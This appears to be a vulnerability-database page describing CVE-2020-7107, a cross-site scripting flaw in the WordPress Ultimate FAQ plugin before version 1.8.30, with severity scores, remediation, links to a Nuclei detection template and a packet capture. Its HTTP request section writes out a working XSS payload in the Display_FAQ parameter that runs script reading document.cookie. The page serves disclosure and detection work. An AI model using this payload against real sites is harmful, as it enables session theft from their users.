🔙 목록으로 돌아가기

CVE-2020-7107: WordPress Ultimate FAQ <1.8.30 - Cross-Site Scripting

TitleWordPress Ultimate FAQ <1.8.30 - Cross-Site Scripting
Authortheamanrawat
SeverityMedium
ImpactSuccessful exploitation of this vulnerability could lead to the execution of arbitrary script code in the context of the affected website, potentially allowing an attacker to steal sensitive information or perform unauthorized actions.
RemediationFixed in version 1.8.30.
CVSS Score6.1
EPSS Score0.05245
CVE IDCVE-2020-7107
CWE IDCWE-79
Tags cve cve2020 ultimate-faqs wpscan xss wordpress wp-plugin wp etoilewebdesign vuln

🔍 Vulnerability Description

WordPress Ultimate FAQ plugin before 1.8.30 is susceptible to cross-site scripting via Display_FAQ to Shortcodes/DisplayFAQs.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

🌐 HTTP Request

GET /wp-content/plugins/ultimate-faqs/readme.txt HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Connection: close
Accept-Encoding: gzip
GET /?Display_FAQ=%3C/script%3E%3Csvg/onload=alert(document.cookie)%3E HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Gecko/20100101 Firefox/135.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-7107.yaml

🦈 Packet Capture: ⬇️ Download cve-2020-7107.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A